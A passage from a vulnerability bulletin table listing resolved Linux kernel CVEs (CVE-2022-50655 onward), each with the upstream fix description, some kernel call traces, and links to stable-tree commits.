__x64_sys_pwritev+0x24/0x30 [ 9.486026] ? do_syscall_64+0x3d/0x80 [ 9.486031] ? entry_SYSCALL_64_after_hwframe+0x63/0xcd Flow dissector tries to find skb net namespace either via device or via socket. Neigher is set in ppp_send_frame, so let's manually use ppp->dev. | 2025-12-09 | not yet calculated | CVE-2022-50655 | https://git.kernel.org/stable/c/e387a25552951802102e279931d6f7dd2ecc34c1 https://git.kernel.org/stable/c/30f186978e87bef2f22ed349010d3e23271e8d44 https://git.kernel.org/stable/c/c2a698ff156974908308f42cf5991ab5c0c4b8cd https://git.kernel.org/stable/c/7da524781c531ebaf2f94c9dc4c541b82edecfed https://git.kernel.org/stable/c/148dcbd3af039ae39c3af697a3183008c7995805 https://git.kernel.org/stable/c/4b8f3b939266c90f03b7cc7e26a4c28c7b64137b https://git.kernel.org/stable/c/18dc946360bfe0de016a59e3cc3ee1f450fceb9d https://git.kernel.org/stable/c/ee678b1f52f9439e930db2db3fd7e345d03e1a50 https://git.kernel.org/stable/c/9f225444467b98579cf28d94f4ad053460dfdb84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: pn533: Clear nfc_target before being used Fix a slab-out-of-bounds read that occurs in nla_put() called from nfc_genl_send_target() when target->sensb_res_len, which is duplicated from an nfc_target in pn533, is too large as the nfc_target is not properly initialized and retains garbage values. Clear nfc_targets with memset() before they are used. Found by a modified version of syzkaller. BUG: KASAN: slab-out-of-bounds in nla_put Call Trace: memcpy nla_put nfc_genl_dump_targets genl_lock_dumpit netlink_dump __netlink_dump_start genl_family_rcv_msg_dumpit genl_rcv_msg netlink_rcv_skb genl_rcv netlink_unicast netlink_sendmsg sock_sendmsg ____sys_sendmsg ___sys_sendmsg __sys_sendmsg do_syscall_64 | 2025-12-09 | not yet calculated | CVE-2022-50656 | https://git.kernel.org/stable/c/9da4a0411f3455e3885831d0758bee3e3d565bbc https://git.kernel.org/stable/c/61a7e15d55fae329a245535c3bac494e401005b8 https://git.kernel.org/stable/c/bef2f478513e7367ef3b05441f6afca981de29be https://git.kernel.org/stable/c/8bddef54cbe9ede5ac7478f1e1e968fcfe7e6f03 https://git.kernel.org/stable/c/aea9e64dec2cc6cd742e07ecd4e6236fc76b389b https://git.kernel.org/stable/c/aae9c24ebd901f482e6c88b6f9e0c80dc5b536d6 https://git.kernel.org/stable/c/755019e37815a66bb0a23893debbd3dd640ccbd3 https://git.kernel.org/stable/c/e491285b4d08884b622638be8e4961eb43b0af64 https://git.kernel.org/stable/c/9f28157778ede0d4f183f7ab3b46995bb400abbe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: riscv: mm: add missing memcpy in kasan_init Hi Atish, It seems that the panic is due to the missing memcpy during kasan_init. Could you please check whether this patch is helpful? When doing kasan_populate, the new allocated base_pud/base_p4d should contain kasan_early_shadow_{pud, p4d}'s content. Add the missing memcpy to avoid page fault when read/write kasan shadow region. Tested on: - qemu with sv57 and CONFIG_KASAN on. - qemu with sv48 and CONFIG_KASAN on. | 2025-12-09 | not yet calculated | CVE-2022-50657 | https://git.kernel.org/stable/c/ff0f6becf3a6f817838b6f80a2c9cca43dce0576 https://git.kernel.org/stable/c/9f2ac64d6ca60db99132e08628ac2899f956a0ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq: qcom: fix memory leak in error path If for some reason the speedbin length is incorrect, then there is a memory leak in the error path because we never free the speedbin buffer. This commit fixes the error path to always free the speedbin buffer. | 2025-12-09 | not yet calculated | CVE-2022-50658 | https://git.kernel.org/stable/c/e55feb31df3fc78b880d6e9d4b5853f05c974833 https://git.kernel.org/stable/c/b5606e3ab1f7cc00d89903f4a11fe57747bb3a68 https://git.kernel.org/stable/c/b6ea267e0c6bdf5463358e2a2e5280cfa6cacc48 https://git.kernel.org/stable/c/9f42cf54403a42cb092636804d2628d8ecf71e75 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwrng: geode - Fix PCI device refcount leak for_each_pci_dev() is implemented by pci_get_device(). The comment of pci_get_device() says that it will increase the reference count for the returned pci_dev and also decrease the reference count for the input pci_dev @from if it is not NULL. If we break for_each_pci_dev() loop with pdev not NULL, we need to call pci_dev_put() to decrease the reference count. We add a new struct 'amd_geode_priv' to record pointer of the pci_dev and membase, and then add missing pci_dev_put() for the normal and error path. | 2025-12-09 | not yet calculated | CVE-2022-50659 | https://git.kernel.org/stable/c/88f4ea623f59155280d99d1a59a968f838472c4a https://git.kernel.org/stable/c/e2f44baf62567c5cfbc274974c7d96dddad53ccc https://git.kernel.org/stable/c/6b9e43c4098f1310f5b4d52121d007a219fa5d43 https://git.kernel.org/stable/c/5cc818ad53df650cac8fb41d9066665366af3f03 https://git.kernel.org/stable/c/aa96aff394a511cc7bb7df08d1b8504d4d97671e https://git.kernel.org/stable/c/82bd423ed977847652b2048b0f8dcf049b1847a9 https://git.kernel.org/stable/c/874f798c2db5ad595e46982d7f727a679dacb048 https://git.kernel.org/stable/c/19b7b85773b18457ff85a9ff4f5e2a2d4bf7ed0c https://git.kernel.org/stable/c/9f6ec8dc574efb7f4f3d7ee9cd59ae307e78f445 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ipw2200: fix memory leak in ipw_wdev_init() In the error path of ipw_wdev_init(), exception value is returned, and the memory applied for in the function is not released. Also the memory is not released in ipw_pci_probe(). As a result, memory leakage occurs. So memory release needs to be added to the error path of ipw_wdev_init(). | 2025-12-09 | not yet calculated | CVE-2022-50660 | https://git.kernel.org/stable/c/75d20ba9506eb90d92e660e04dd887ff1495fcc3 https://git.kernel.org/stable/c/fb3517b92a45c8004ac26250ae041a24eb23fef1 https://git.kernel.org/stable/c/112c1af02b8f535baf42ef9d807aea963705ef15 https://git.kernel.org/stable/c/8a2eb9d9d0c1535bc8e22840193bff4cdcac878b https://git.kernel.org/stable/c/9424ea9d557ef41d86eb40b6349ae991c3dcff89 https://git.kernel.org/stable/c/62ec7e8bf42f1542f966dda687c654aae81718c8 https://git.kernel.org/stable/c/1f590fb3d14e5db3a9e06ee141b1685c429278ce https://git.kernel.org/stable/c/9fe21dc626117fb44a8eb393713a86a620128ce3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: seccomp: Move copy_seccomp() to no failure path. Our syzbot instance reported memory leaks in do_seccomp() [0], similar to the report [1]. It shows that we miss freeing struct seccomp_filter and some objects included in it. We can reproduce the issue with the program below [2] which calls one seccomp() and two clone() syscalls. The first clone()d child exits earlier than its parent and sends a signal to kill it during the second clone(), more precisely before the fatal_signal_pending() test in copy_process(). When the parent receives the signal, it has to destroy the embryonic process and return -EINTR to user space. In the failure path, we have to call seccomp_filter_release() to decrement the filter's refcount. Initially, we called it in free_task() called from the failure path, but the commit 3a15fb6ed92c ("seccomp: release filter after task is fully dead") moved it to release_task() to notify user space as early as possible that the filter is no longer used. To keep the change and current seccomp refcount semantics, let's move copy_seccomp() just after the signal check and add a WARN_ON_ONCE() in free_task() for future debugging. [0]: unreferenced object 0xffff8880063add00 (size 256): comm "repro_seccomp", pid 230, jiffies 4294687090 (age 9.914s) hex dump (first 32 bytes): 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 ................ ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ backtrace: do_seccomp (./include/linux/slab.h:600 ./include/linux/slab.h:733 kernel/seccomp.c:666 kernel/seccomp.c:708 kernel/seccomp.c:1871 kernel/seccomp.c:1991) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) unreferenced object 0xffffc90000035000 (size 4096): comm "repro_seccomp", pid 230, jiffies 4294687090 (age 9.915s) hex dump (first 32 bytes): 01 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: __vmalloc_node_range (mm/vmalloc.c:3226) __vmalloc_node (mm/vmalloc.c:3261 (discriminator 4)) bpf_prog_alloc_no_stats (kernel/bpf/core.c:91) bpf_prog_alloc (kernel/bpf/core.c:129) bpf_prog_create_from_user (net/core/filter.c:1414) do_seccomp (kernel/seccomp.c:671 kernel/seccomp.c:708 kernel/seccomp.c:1871 kernel/seccomp.c:1991) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) unreferenced object 0xffff888003fa1000 (size 1024): comm "repro_seccomp", pid 230, jiffies 4294687090 (age 9.915s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: bpf_prog_alloc_no_stats (./include/linux/slab.h:600 ./include/linux/slab.h:733 kernel/bpf/core.c:95) bpf_prog_alloc (kernel/bpf/core.c:129) bpf_prog_create_from_user (net/core/filter.c:1414) do_seccomp (kernel/seccomp.c:671 kernel/seccomp.c:708 kernel/seccomp.c:1871 kernel/seccomp.c:1991) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) unreferenced object 0xffff888006360240 (size 16): comm "repro_seccomp", pid 230, jiffies 4294687090 (age 9.915s) hex dump (first 16 bytes): 01 00 37 00 76 65 72 6c e0 83 01 06 80 88 ff ff ..7.verl........ backtrace: bpf_prog_store_orig_filter (net/core/filter.c:1137) bpf_prog_create_from_user (net/core/filter.c:1428) do_seccomp (kernel/seccomp.c:671 kernel/seccomp.c:708 kernel/seccomp.c:1871 kernel/seccomp.c:1991) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) unreferenced object 0xffff888 ---truncated--- | 2025-12-09 | not yet calculated | CVE-2022-50661 | https://git.kernel.org/stable/c/d4a895e924b486f2a38463114509e1088ef4d7f5 https://git.kernel.org/stable/c/a31a647a3d1073a642c5bbe3457731fb353cb980 https://git.kernel.org/stable/c/29a69fa075d0577eff1137426669de21187ec182 https://git.kernel.org/stable/c/5b81f0c6c60e35bf8153230ddfb03ebb14e17986 https://git.kernel.org/stable/c/a1140cb215fa13dcec06d12ba0c3ee105633b7c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: fix memory leak in hns_roce_alloc_mr() When hns_roce_mr_enable() failed in hns_roce_alloc_mr(), mr_key is not released. Compiled test only. | 2025-12-09 | not yet calculated | CVE-2022-50662 | https://git.kernel.org/stable/c/164fa80330a81db67c26d10d071083941d29a510 https://git.kernel.org/stable/c/35f9cd060e68ff910e49bf37b1b0d336a311849a https://git.kernel.org/stable/c/fd32e378bc1dea0d48767adf2bbb478581bb0a95 https://git.kernel.org/stable/c/fc2c43bf41c89e7451fe750025ae55eb2e2a741d https://git.kernel.org/stable/c/a115aa00b18f7b8982b8f458149632caf64a862a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix possible memory leak in stmmac_dvr_probe() The bitmap_free() should be called to free priv->af_xdp_zc_qps when create_singlethread_workqueue() fails, otherwise there will be a memory leak, so we add the err path error_wq_init to fix it. | 2025-12-09 | not yet calculated | CVE-2022-50663 | https://git.kernel.org/stable/c/96e50897029f65222ef76cfe9bc802321fcea33b https://git.kernel.org/stable/c/b59253e32c203a20bce15dca80890b7d268bacd7 https://git.kernel.org/stable/c/446757787baf99b7db15cb347783c45a37bfe21f https://git.kernel.org/stable/c/a137f3f27f9290933fe7e40e6dc8a445781c31a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: fix leak of memory fw | 2025-12-09 | not yet calculated | CVE-2022-50664 | https://git.kernel.org/stable/c/afccb6ac63fc4328bc61ba086a3cad30054d87c1 https://git.kernel.org/stable/c/a44828482bd5b11d728d7dac09b0d723aab9ff7b https://git.kernel.org/stable/c/b4d8fd008de1774d99a5b50acc03d92a1919c3a7 https://git.kernel.org/stable/c/438a4a8dece2abac099777a00db91784c0996cdc https://git.kernel.org/stable/c/b42580c8d8aac11a66046897979cc13cfd04c541 https://git.kernel.org/stable/c/438cd29fec3ea09769639f6032687e0c1434dbe0 https://git.kernel.org/stable/c/25cab05aa2df904ee1fea37d8dfa0d92c951bb4e https://git.kernel.org/stable/c/669fb90507dbaf419aa3871bf73160e93d50487f https://git.kernel.org/stable/c/a15fe8d9f1bf460a804bcf18a890bfd2cf0d5caa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix failed to find the peer with peer_id 0 when disconnected It has a fail log which is ath11k_dbg in ath11k_dp_rx_process_mon_status(), as below, it will not print when debug_mask is not set ATH11K_DBG_DATA. ath11k_dbg(ab, ATH11K_DBG_DATA, "failed to find the peer with peer_id %d\n", ppdu_info.peer_id); When run scan with station disconnected, the peer_id is 0 for case HAL_RX_MPDU_START in ath11k_hal_rx_parse_mon_status_tlv() which called from ath11k_dp_rx_process_mon_status(), and the peer_id of ppdu_info is reset to 0 in the while loop, so it does not match condition of the check "if (ppdu_info->peer_id == HAL_INVALID_PEERID" in the loop, and then the log "failed to find the peer with peer_id 0" print after the check in the loop, it is below call stack when debug_mask is set ATH11K_DBG_DATA. The reason is this commit 01d2f285e3e5 ("ath11k: decode HE status tlv") add "memset(ppdu_info, 0, sizeof(struct hal_rx_mon_ppdu_info))" in ath11k_dp_rx_process_mon_status(), but the commit does not initialize the peer_id to HAL_INVALID_PEERID, then lead the check mis-match. Callstack of the failed log: [12335.689072] RIP: 0010:ath11k_dp_rx_process_mon_status+0x9ea/0x1020 [ath11k] [12335.689157] Code: 89 ff e8 f9 10 00 00 be 01 00 00 00 4c 89 f7 e8 dc 4b 4e de 48 8b 85 38 ff ff ff c7 80 e4 07 00 00 01 00 00 00 e9 20 f8 ff ff <0f> 0b 41 0f b7 96 be 06 00 00 48 c7 c6 b8 50 44 c1 4c 89 ff e8 fd [12335.689180] RSP: 0018:ffffb874001a4ca0 EFLAGS: 00010246 [12335.689210] RAX: 0000000000000000 RBX: ffff995642cbd100 RCX: 0000000000000000 [12335.689229] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff99564212cd18 [12335.689248] RBP: ffffb874001a4dc0 R08: 0000000000000001 R09: 0000000000000000 [12335.689268] R10: 0000000000000220 R11: ffffb874001a48e8 R12: ffff995642473d40 [12335.689286] R13: ffff99564212c5b8 R14: ffff9956424736a0 R15: ffff995642120000 [12335.689303] FS: 0000000000000000(0000) GS:ffff995739000000(0000) knlGS:0000000000000000 [12335.689323] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [12335.689341] CR2: 00007f43c5d5e039 CR3: 000000011c012005 CR4: 00000000000606e0 [12335.689360] Call Trace: [12335.689377] <IRQ> [12335.689418] ? rcu_read_lock_held_common+0x12/0x50 [12335.689447] ? rcu_read_lock_sched_held+0x25/0x80 [12335.689471] ? rcu_read_lock_held_common+0x12/0x50 [12335.689504] ath11k_dp_rx_process_mon_rings+0x8d/0x4f0 [ath11k] [12335.689578] ? ath11k_dp_rx_process_mon_rings+0x8d/0x4f0 [ath11k] [12335.689653] ? lock_acquire+0xef/0x360 [12335.689681] ? rcu_read_lock_sched_held+0x25/0x80 [12335.689713] ath11k_dp_service_mon_ring+0x38/0x60 [ath11k] [12335.689784] ? ath11k_dp_rx_process_mon_rings+0x4f0/0x4f0 [ath11k] [12335.689860] call_timer_fn+0xb2/0x2f0 [12335.689897] ? ath11k_dp_rx_process_mon_rings+0x4f0/0x4f0 [ath11k] [12335.689970] run_timer_softirq+0x21f/0x540 [12335.689999] ? ktime_get+0xad/0x160 [12335.690025] ? lapic_next_deadline+0x2c/0x40 [12335.690053] ? clockevents_program_event+0x82/0x100 [12335.690093] __do_softirq+0x151/0x4a8 [12335.690135] irq_exit_rcu+0xc9/0x100 [12335.690165] sysvec_apic_timer_interrupt+0xa8/0xd0 [12335.690189] </IRQ> [12335.690204] <TASK> [12335.690225] asm_sysvec_apic_timer_interrupt+0x12/0x20 Reset the default value to HAL_INVALID_PEERID each time after memset of ppdu_info as well as others memset which existed in function ath11k_dp_rx_process_mon_status(), then the failed log disappeared. Tested-on: WCN6855 hw2.0 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3 | 2025-12-09 | not yet calculated | CVE-2022-50665 | https://git.kernel.org/stable/c/c0bb97a90b133416b50b3ffbdb7efca9253cc687 https://git.kernel.org/stable/c/a5b03df19041e5ce35c7f048fa84bf1b0ceb1311 https://git.kernel.org/stable/c/a20ed60bb357776301c2dad7b4a4f0db97e143e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/siw: Fix QP destroy to wait for all references dropped. Delay QP destroy completion until all siw references to QP are dropped. The calling RDMA core will free QP structure after successful return from siw_qp_destroy() call, so siw must not hold any remaining reference to the QP upon return. A use-after-free was encountered in xfstest generic/460, while testing NFSoRDMA. Here, after a TCP connection drop by peer, the triggered siw_cm_work_handler got delayed until after QP destroy call, referencing a QP which has already freed. | 2025-12-09 | not yet calculated | CVE-2022-50666 | https://git.kernel.org/stable/c/5c75d608fad58301b63e7d69200c13c3a1d411da https://git.kernel.org/stable/c/74ad141e995a730760b1bcfa14854b7f1057d6bc https://git.kernel.org/stable/c/0ed8bf9d0bb19f3f5eedd73f04aaf5bba9ac0737 https://git.kernel.org/stable/c/a3c278807a459e6f50afee6971cabe74cccfb490 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: Fix memory leak in vmw_mksstat_add_ioctl() If the copy of the description string from userspace fails, then the page for the instance descriptor doesn't get freed before returning -EFAULT, which leads to a memleak. | 2025-12-09 | not yet calculated | CVE-2022-50667 | https://git.kernel.org/stable/c/b47a37ad4a444d82f9caf153a79d090b79786ebb https://git.kernel.org/stable/c/6ad40bbb2c25f17b899fcea114ebc0a46d8a938b https://git.kernel.org/stable/c/53066b144715332ce9370143c33c50d9a4d3e809 https://git.kernel.org/stable/c/a40c7f61d12fbd1e785e59140b9efd57127c0c33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix deadlock due to mbcache entry corruption When manipulating xattr blocks, we can deadlock infinitely looping inside ext4_xattr_block_set() where we constantly keep finding xattr block for reuse in mbcache but we are unable to reuse it because its reference count is too big. This happens because cache entry for the xattr block is marked as reusable (e_reusable set) although its reference count is too big. When this inconsistency happens, this inconsistent state is kept indefinitely and so ext4_xattr_block_set() keeps retrying indefinitely. The inconsistent state is caused by non-atomic update of e_reusable bit. e_reusable is part of a bitfield and e_reusable update can race with update of e_referenced bit in the same bitfield resulting in loss of one of the updates. Fix the problem by using atomic bitops instead. This bug has been around for many years, but it became *much* easier to hit after commit 65f8b80053a1 ("ext4: fix race when reusing xattr blocks"). | 2025-12-09 | not yet calculated | CVE-2022-50668 | https://git.kernel.org/stable/c/efaa0ca678f56d47316a08030b2515678cebbc50 https://git.kernel.org/stable/c/af53065276376750dfac35a7248af18806404c5d https://git.kernel.org/stable/c/1be16a0c2f10186df505e28b0cc92d7f3366e2a8 https://git.kernel.org/stable/c/5bc0b2fda4b47c86278f7c6d30c211f425bf51cf https://git.kernel.org/stable/c/127b80cefb941a81255c72f11081123f3a705369 https://git.kernel.org/stable/c/cc1538c693d25e282bed8c54b65c914a04023a78 https://git.kernel.org/stable/c/a44e84a9b7764c72896f7241a0ec9ac7e7ef38dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: ocxl: fix possible name leak in ocxl_file_register_afu() If device_register() returns error in ocxl_file_register_afu(), the name allocated by dev_set_name() need be freed. As comment of device_register() says, it should use put_device() to give up the reference in the error path. So fix this by calling put_device(), then the name can be freed in kobject_cleanup(), and info is freed in info_release(). | 2025-12-09 | not yet calculated | CVE-2022-50669 | https://git.kernel.org/stable/c/0cd05062371a49774e8a45258bdedf0bd6d3d327 https://git.kernel.org/stable/c/7525741cb302a1672b8c3a5edb2a08e4229b5c7c https://git.kernel.org/stable/c/3299983a6bf628249ac650908e62d12de959341e https://git.kernel.org/stable/c/557b7de055d1e230ddb6664c29d26917b8db9143 https://git.kernel.org/stable/c/2fce8b3583d1641a1716486f408478b58e96ec91 https://git.kernel.org/stable/c/a4cb1004aeed2ab893a058fad00a5b41a12c4691 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: omap_hsmmc: fix return value check of mmc_add_host() mmc_add_host() may return error, if we ignore its return value, it will lead two issues: 1. The memory that allocated in mmc_alloc_host() is leaked. 2. In the remove() path, mmc_remove_host() will be called to delete device, but it's not added yet, it will lead a kernel crash because of null-ptr-deref in device_del(). Fix this by checking the return value and goto error path wihch will call mmc_free_host(). | 2025-12-09 | not yet calculated | CVE-2022-50670 | https://git.kernel.org/stable/c/f153c9e15f8961bdf38707853e15b42ea7c691d9 https://git.kernel.org/stable/c/fb3d596267a98813a7a8206097d8d46c98505a0d https://git.kernel.org/stable/c/62005dfcc396424db3337a1dc3ab49623537f5e5 https://git.kernel.org/stable/c/a5f8a4583280a76e50329b910e91ef1dea1e6c79 https://git.kernel.org/stable/c/4e1dc24bcfc8257f24c0663badec7e4f3ae80558 https://git.kernel.org/stable/c/a525cad241c339ca00bf7ebf03c5180f2a9b767c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix "kernel NULL pointer dereference" error When rxe_queue_init in the function rxe_qp_init_req fails, both qp->req.task.func and qp->req.task.arg are not initialized. Because of creation of qp fails, the function rxe_create_qp will call rxe_qp_do_cleanup to handle allocated resource. Before calling __rxe_do_task, both qp->req.task.func and qp->req.task.arg should be checked. | 2025-12-09 | not yet calculated | CVE-2022-50671 | https://git.kernel.org/stable/c/48cd7098e71735ccafa0b3cf27c53924f9cb5b2f https://git.kernel.org/stable/c/eca119693010032d6cc6e7e9b4fb2c363c7e12ce https://git.kernel.org/stable/c/9c5dd6993c794703e74c6ba17ac78ca0211ef940 https://git.kernel.org/stable/c/0d773c58d702f0a7c16ee8d69617fd2c28350795 https://git.kernel.org/stable/c/cdce36a88def550773142a34ef727a830cad96a8 https://git.kernel.org/stable/c/f2f405af70e6f0419e718d23fa304798a5405c41 https://git.kernel.org/stable/c/bb33fa65da77f5f02dbee6f25cebaeedfcd70028 https://git.kernel.org/stable/c/3b8752f086eb6865cc3662ad13249b03024501e5 https://git.kernel.org/stable/c/a625ca30eff806395175ebad3ac1399014bdb280 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mailbox: zynq-ipi: fix error handling while device_register() fails If device_register() fails, it has two issues: 1. The name allocated by dev_set_name() is leaked. 2. The parent of device is not NULL, device_unregister() is called in zynqmp_ipi_free_mboxes(), it will lead a kernel crash because of removing not added device. Call put_device() to give up the reference, so the name is freed in kobject_cleanup(). Add device registered check in zynqmp_ipi_free_mboxes() to avoid null-ptr-deref. | 2025-12-09 | not yet calculated | CVE-2022-50672 | https://git.kernel.org/stable/c/b3a5c76f61e2b380e29dfc6705854ca1ee85501d https://git.kernel.org/stable/c/a39b4de0804f9fe0ae911b359ffd4afe7d9d933b https://git.kernel.org/stable/c/4f05d8e2fb3ab702c2633a74571e1b31cb579985 https://git.kernel.org/stable/c/f2d63cefc012cafe1b7651bbf3302f8bcd8bea4a https://git.kernel.org/stable/c/3fcf079958c00d83c51e4f250abf2c77fe9cc1b9 https://git.kernel.org/stable/c/a6792a0cdef0b1c2d77920246283a72537e60e94 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix use-after-free in ext4_orphan_cleanup I caught a issue as follows: ================================================================== BUG: KASAN: use-after-free in __list_add_valid+0x28/0x1a0 Read of size 8 at addr ffff88814b13f378 by task mount/710 CPU: 1 PID: 710 Comm: mount Not tainted 6.1.0-rc3-next #370 Call Trace: <TASK> dump_stack_lvl+0x73/0x9f print_report+0x25d/0x759 kasan_report+0xc0/0x120 __asan_load8+0x99/0x140 __list_add_valid+0x28/0x1a0 ext4_orphan_cleanup+0x564/0x9d0 [ext4] __ext4_fill_super+0x48e2/0x5300 [ext4] ext4_fill_super+0x19f/0x3a0 [ext4] get_tree_bdev+0x27b/0x450 ext4_get_tree+0x19/0x30 [ext4] vfs_get_tree+0x49/0x150 path_mount+0xaae/0x1350 do_mount+0xe2/0x110 __x64_sys_mount+0xf0/0x190 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> [...] ================================================================== Above issue may happen as follows: ------------------------------------- ext4_fill_super ext4_orphan_cleanup --- loop1: assume last_orphan is 12 --- list_add(&EXT4_I(inode)->i_orphan, &EXT4_SB(sb)->s_orphan) ext4_truncate --> return 0 ext4_inode_attach_jinode --> return -ENOMEM iput(inode) --> free inode<12> --- loop2: last_orphan is still 12 --- list_add(&EXT4_I(inode)->i_orphan, &EXT4_SB(sb)->s_orphan); // use inode<12> and trigger UAF To solve this issue, we need to propagate the return value of ext4_inode_attach_jinode() appropriately. | 2025-12-09 | not yet calculated | CVE-2022-50673 | https://git.kernel.org/stable/c/7f801a1593cb957f73659732836b2dafbdfc7709 https://git.kernel.org/stable/c/026a4490b5381229a30f23d073b58e8e35ee6858 https://git.kernel.org/stable/c/7223d5e75f26352354ea2c0ccf8b579821b52adf https://git.kernel.org/stable/c/cf0e0817b0f925b70d101d7014ea81b7094e1159 https://git.kernel.org/stable/c/c2bdbd4c69308835d1b6f6ba74feeccbfe113478 https://git.kernel.org/stable/c/7908b8a541b1578cc61b4da7f19b604a931441da https://git.kernel.org/stable/c/a71248b1accb2b42e4980afef4fa4a27fa0e36f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: riscv: vdso: fix NULL deference in vdso_join_timens() when vfork Testing tools/testing/selftests/timens/vfork_exec.c got below kernel log: [ 6.838454] Unable to handle kernel access to user memory without uaccess routines at virtual address 0000000000000020 [ 6.842255] Oops [#1] [ 6.842871] Modules linked in: [ 6.844249] CPU: 1 PID: 64 Comm: vfork_exec Not tainted 6.0.0-rc3-rt15+ #8 [ 6.845861] Hardware name: riscv-virtio,qemu (DT) [ 6.848009] epc : vdso_join_timens+0xd2/0x110 [ 6.850097] ra : vdso_join_timens+0xd2/0x110 [ 6.851164] epc : ffffffff8000635c ra : ffffffff8000635c sp : ff6000000181fbf0 [ 6.852562] gp : ffffffff80cff648 tp : ff60000000fdb700 t0 : 3030303030303030 [ 6.853852] t1 : 0000000000000030 t2 : 3030303030303030 s0 : ff6000000181fc40 [ 6.854984] s1 : ff60000001e6c000 a0 : 0000000000000010 a1 : ffffffff8005654c [ 6.856221] a2 : 00000000ffffefff a3 : 0000000000000000 a4 : 0000000000000000 [ 6.858114] a5 : 0000000000000000 a6 : 0000000000000008 a7 : 0000000000000038 [ 6.859484] s2 : ff60000001e6c068 s3 : ff6000000108abb0 s4 : 0000000000000000 [ 6.860751] s5 : 0000000000001000 s6 : ffffffff8089dc40 s7 : ffffffff8089dc38 [ 6.862029] s8 : ffffffff8089dc30 s9 : ff60000000fdbe38 s10: 000000000000005e [ 6.863304] s11: ffffffff80cc3510 t3 : ffffffff80d1112f t4 : ffffffff80d1112f [ 6.864565] t5 : ffffffff80d11130 t6 : ff6000000181fa00 [ 6.865561] status: 0000000000000120 badaddr: 0000000000000020 cause: 000000000000000d [ 6.868046] [<ffffffff8008dc94>] timens_commit+0x38/0x11a [ 6.869089] [<ffffffff8008dde8>] timens_on_fork+0x72/0xb4 [ 6.870055] [<ffffffff80190096>] begin_new_exec+0x3c6/0x9f0 [ 6.871231] [<ffffffff801d826c>] load_elf_binary+0x628/0x1214 [ 6.872304] [<ffffffff8018ee7a>] bprm_execve+0x1f2/0x4e4 [ 6.873243] [<ffffffff8018f90c>] do_execveat_common+0x16e/0x1ee [ 6.874258] [<ffffffff8018f9c8>] sys_execve+0x3c/0x48 [ 6.875162] [<ffffffff80003556>] ret_from_syscall+0x0/0x2 [ 6.877484] ---[ end trace 0000000000000000 ]--- This is because the mm->context.vdso_info is NULL in vfork case. From another side, mm->context.vdso_info either points to vdso info for RV64 or vdso info for compat, there's no need to bloat riscv's mm_context_t, we can handle the difference when setup the additional page for vdso. | 2025-12-09 | not yet calculated | CVE-2022-50674 | https://git.kernel.org/stable/c/df30c4feba51beeb138f3518c2421abc8cbda3c1 https://git.kernel.org/stable/c/f2419a6fbb4caf8cf3fe0ac7e4cf2e28127d04b4 https://git.kernel.org/stable/c/a8616d2dc193b6becc36b5f3cfeaa9ac7a5762f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: mte: Avoid setting PG_mte_tagged if no tags cleared or restored Prior to commit 69e3b846d8a7 ("arm64: mte: Sync tags for pages where PTE is untagged"), mte_sync_tags() was only called for pte_tagged() entries (those mapped with PROT_MTE). Therefore mte_sync_tags() could safely use test_and_set_bit(PG_mte_tagged, &page->flags) without inadvertently setting PG_mte_tagged on an untagged page. The above commit was required as guests may enable MTE without any control at the stage 2 mapping, nor a PROT_MTE mapping in the VMM. However, the side-effect was that any page with a PTE that looked like swap (or migration) was getting PG_mte_tagged set automatically. A subsequent page copy (e.g. migration) copied the tags to the destination page even if the tags were owned by KASAN. This issue was masked by the page_kasan_tag_reset() call introduced in commit e5b8d9218951 ("arm64: mte: reset the page tag in page->flags"). When this commit was reverted (20794545c146), KASAN started reporting access faults because the overriding tags in a page did not match the original page->flags (with CONFIG_KASAN_HW_TAGS=y): BUG: KASAN: invalid-access in copy_page+0x10/0xd0 arch/arm64/lib/copy_page.S:26 Read at addr f5ff000017f2e000 by task syz-executor.1/2218 Pointer tag: [f5], memory tag: [f2] Move the PG_mte_tagged bit setting from mte_sync_tags() 